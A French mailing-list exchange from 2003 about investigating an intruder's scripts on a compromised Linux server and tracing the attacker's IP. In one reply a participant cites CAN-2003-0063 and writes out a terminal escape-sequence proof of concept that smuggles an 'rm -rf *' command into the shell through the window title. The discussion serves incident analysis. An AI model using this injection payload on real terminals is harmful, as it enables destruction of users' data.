Re : HS [Intrusion, reconstitution] était Re: Quel kernel ?

Le 26.12.2003 22:36, François Boisson a écrit :
> [...]
|les
|deux disques et étudier un peu ce que le gars a fait. Ma première
|question
|est celle ci, l'un des scripts commence par
|

|#!/bin/sh
|cl="ESC[0m"
|cyn="ESC[36m"
|wht="ESC[37m"
|puis on voit des commandes du type
|echo "${cl}${cyn}|${cl}${hcyn}--- ${cl}${wht}Getting the IP
|adress...">/dev/stderr
|
|à ma connaissance, c'est pour faire beau à l'écran (clignotement,

Il y a eu le CAN-2003-0063 qui signalait qu'on pouvait exploiter une commande esc :
   echo -e '\e]2;s && echo rm -rf *\a' > /tmp/sploit
   echo -e '\e[21t' >> /tmp/sploit
   cat /tmp/sploit

Peut-être est-ce le même genre d'exploit ?

--
		- Jean-Luc

> [...]
|
|Ce qui est idiot c'est que dans ce cas, j'aurai pu récupérer
|l'environnement, la ligne de commande, etc et identifier plus
|clairement
|le vers.
|
|Quelqu'un sait-il comment retrouver l'adresse du gars dans ce bazar?
|En
|épluchant les logs, je vois plein de connections wu-ftpd sans
|chargement
|de fichiers correspondant mais venant d'adresses très différentes, le
|gars
|masquait son IP mais dans ce cas, pouvait il avoir les réponses en

|--